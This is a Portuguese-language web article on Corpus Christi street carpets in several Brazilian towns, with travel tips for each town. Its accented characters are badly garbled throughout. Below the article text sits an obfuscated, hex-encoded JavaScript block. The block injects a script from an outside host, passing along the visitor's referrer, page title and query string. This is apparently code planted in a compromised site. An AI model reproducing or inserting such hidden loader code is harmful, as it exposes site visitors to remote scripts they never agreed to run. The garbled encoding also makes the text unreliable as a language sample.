Home » Colunistas » Tapetes coloridos transformam as ruas em obras de arte durante o feriado

Tapetes coloridos transformam as ruas em obras de arte durante o feriado

AlA�m de abrir caminho para a procissA?o que celebra o SantA�ssimo Sacramento, os tradicionais tapetes coloridos viraram atraA�A?o turA�stica em diversas cidades brasileiras. ConheA�a algumas delas e seus encantos

A tradiA�A?o catA?lica diz que a celebraA�A?o do Corpo e Sangue de Cristo deve ser acompanhada nA?o sA? por oraA�A?o. Para os fiA�is, o Corpus Christi A� tambA�m uma data para cobrir as ruas com tapetes coloridos, por onde passam as procissA�es. O costume foi trazido de Portugal e virou atraA�A?o em vA?rias cidades brasileiras, como Ouro Preto (MG), PirenA?polis (GO) e Castelo (ES) a�� onde A�, inclusive, considerada uma das sete maravilhas do municA�pio. BrasA�lia nA?o fica de fora e, durante o feriado cristA?o, o tapete toma conta da Esplanada dos MinistA�rios.

Quem pretende sair da cidade no feriado prolongado pode contemplar essas maravilhas paA�s afora. Em Flores da Cunha, na Serra GaA?cha, por exemplo, hA? mais de meio sA�culo, os fiA�is se reA?nem em torno da tradiA�A?o. Os preparativos estA?o a todo vapor, com a produA�A?o das serragens coloridas.

a celebraA�A?o ocorre de 26 a 29 de maio e, entre os temas homenageados, estA?o os 140 anos de colonizaA�A?o de Flores da Cunha. O evento tem tanto destaque que ganhou, por dois anos seguidos (em 2013 e 2014), o 1A? lugar no PrA?mio InovaA�A?o de Turismo, promovido pelo governo gaA?cho. A cada Corpus Christi, a cidade recebe milhares de visitantes para acompanhar nA?o sA? a celebraA�A?o cristA? como para desfrutar das belezas da regiA?o.

Localizada a 150km da capital, Porto Alegre, Flores da Cunha A� cercada de natureza exuberante, praA�as aconchegantes, torres, cascatas, pelo sabor da farta gastronomia e dos deliciosos vinhos. Localizada a 710m de altitude, a cidade ostenta, desde 1994, o tA�tulo de maior produtora de vinho do paA�s. NA?o deixe de ir atA� o Mirante Gelain, para avistar o Rio das Antas, e tambA�m ao Mirante Gaio, para apreciar a serra do alto.

MatA?o (SP)

A Festa de Corpus Christi em MatA?o, SA?o Paulo, tambA�m A� tradicional e conhecida pelos turistas. A� promovida oficialmente desde 1948. Artistas e voluntA?rios utilizam, todos os anos, em torno de 70 toneladas de material para a confecA�A?o dos desenhos, que se estendem por 12 quarteirA�es. Os milhares de visitantes atraA�dos pelas ruas enfeitadas contam ainda diversos eventos culturais e de lazer, como: exposiA�A�es artA�sticas, feira de artesanato, apresentaA�A�es musicais, projeto turista artista (o turista participa da confecA�A?o dos tapetes), exploflor (exposiA�A?o e venda de flores) e feira de camelA?s. A cidade fica a cerca de 800km de BrasA�lia.
Santana de ParnaA�ba (SP)

Levi Bianco/Flickr

O Corpus Christi tambA�m atrai milhares de pessoas de municA�pios prA?ximos a Santana de ParnaA�ba. Entre as principais atraA�A�es, os tapetes coloridos. Com extensA?o de cerca de 850 metros, cobrem as principais ruas do Centro HistA?rico, que por si sA? A� uma atraA�A?o a parte, com suas casas antigas, do tempo em que a cidade era ponto de partida das expediA�A�es bandeirantes ao interior paulista. A distA?ncia de Santana de ParnaA�ba de BrasA�lia A� 991,7km. NA?o deixe de conhecer o Museu Casa do Anhanguera, imA?vel do sA�culo 17com grande valor arquitetA?nico e histA?rico. A� a A?nica construA�A?o remanescente de casa bandeirista urbana. Foi tombada pelo Instituto do PatrimA?nio HistA?rico Nacional (Iphan), em 1958.
Castelo (ES)

Argeone Eliud Herbst/Flickr

Em Castelo, no sul do EspA�rito Santo, as comemoraA�A�es da festa de Corpus Christi atraem mais de 80 mil pessoas. Pelo menos 3 mil fiA�is voluntA?rios ficam envolvidos na confecA�A?o nos tapetes espalhados pela cidade. A tradiA�A?o de produzi-los no centro surgiu em 1964. Os materiais utilizados sA?o diversos a�� vA?o de terra vermelha, passando por borra de cafA�, pA? de serra tingido ou natural, a pA? de pneus, cal, tampinhas de garrafa pet e bolinhas de gude. A festa de Corpus Christi A� considerada uma das sete maravilhas da cidade, ao lado de belezas como a Cachoeira do Pedregulho, o CasarA?o da Fazenda do Centro, a Igreja Matriz, o SantuA?rio de AracuA�, a Gruta do Limoeiro e o Parque Estadual do Forno Grande.
PirenA?polis (GO)

Zeus/Flickr

Se o destino no feriado A� PirenA?polis (GO), alA�m de desfrutarem das belezas do cerrado, os turistas podem acompanhar as celebraA�A�es cristA?s. A movimentaA�A?o comeA�a na vA�spera de Corpus Christi, com a montagem do tapete. Na quinta-feira, os fiA�is saem em procissA?o, que A� acompanhada pela Irmandade do SantA�ssimo Sacramento e pela Orquestra e Coral Nossa Senhora do RosA?rio. A� neste dia que o Imperador do Divino recebe a coroa para a realizaA�A?o da Festa do Divino de PirenA?polis, do ano seguinte. NA?o deixe de conhecer pelo menos uma das muitas cachoeiras de Piri. Entre as mais badaladas, estA?o as do Abade, do LA?zaro, das Araras, da Meia Lua, dos DragA�es, do RosA?rio e da Usina Velha.
Cabo Frio (RJ)

JA�h PerdigA?/CB/D.A Press

A cidade localizada na regiA?o serrana do Rio de Janeiro tem uma tradiA�A?o ainda mais peculiar nas celebraA�A�es de Corpus Christi. Para ornamentar as ruas, os fiA�is substituem a base de serragem por sal grosso colorido e TNT. O tapete de Cabo Frio A� um dos mais conhecidos do paA�s, e quem for A� cidade durante esse feriado pode desfrutar de suas praias da areia branquinha. A principal delas A� a do Forte, tambA�m conhecida como a Praia da Barra, com 7,5km de extensA?o. A� um dos cartA�es-postais de Cabo Frio e point de turistas. De mar aberto, jA? foi considerada pelos velejadores como a maior raia do mundo para a prA?tica do esporte. A cidade fica a 1,2 mil km da capital. PrA?ximo, o visitante ainda pode conhecer outras maravilhas, como Arraial do Cabo e BA?zios.
FlorianA?polis (SC)

Simone Verzola/Flickr

A confecA�A?o dos tapetes de areia e serragem tambA�m A� costume na capital catarinense. A procissA?o de Corpus Christi de FlorianA?polis ocorre em torno da A?rea central da cidade, entre as praA�as 15 de Novembro e Pereira Oliveira. Grupos de moradores, congregaA�A�es religiosas, entidades beneficentes e movimentos ligados A� Igreja CatA?lica dividem a tarefa de enfeitar as ruas, cada grupo responsA?vel por uma pequena parte do trajeto de 1,5km. Em visita A� cidade, nA?o deixe de conhecer as belas praias a�� entre elas, a de JurerA?, no bairro dividido entre JurerA? Internacional (com bares, restaurantes e boates) e JurerA? Tradicional (com restaurantes de comida tA�picaa�?. Fica a 27km do centro de Floripa.
Ouro Preto (MG)

Edmar Moreira/Flickr

Em Ouro Preto, as ladeiras e o Centro HistA?rico, forrados por pedras, ficam coloridos nesta A�poca do ano pelo tradicional tapete de Corpus Christi. Seguindo o espA�rito religioso, nA?o deixe de conhecer as belas igrejas da cidade histA?rica, localizada a 820km de BrasA�lia, como a de Nossa Senhora do Carmo. A construA�A?o de 1766 foi projetada por Manuel Francisco Lisboa e, posteriormente, modificada por seu filho, AntA?nio Francisco Lisboa, o Aleijadinho. O destaque sA?o as torres, coroamento em forma de sino arrematado por pequena pirA?mide em obelisco, como na Igreja de SA?o Francisco de Assis. Ao lado, na antiga casa do Noviciado, onde Aleijadinho viveu seus A?ltimos anos, funciona o Museu do OratA?rio.

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Publicação: Redação Brasil (m)

Login

Perdeu sua senha?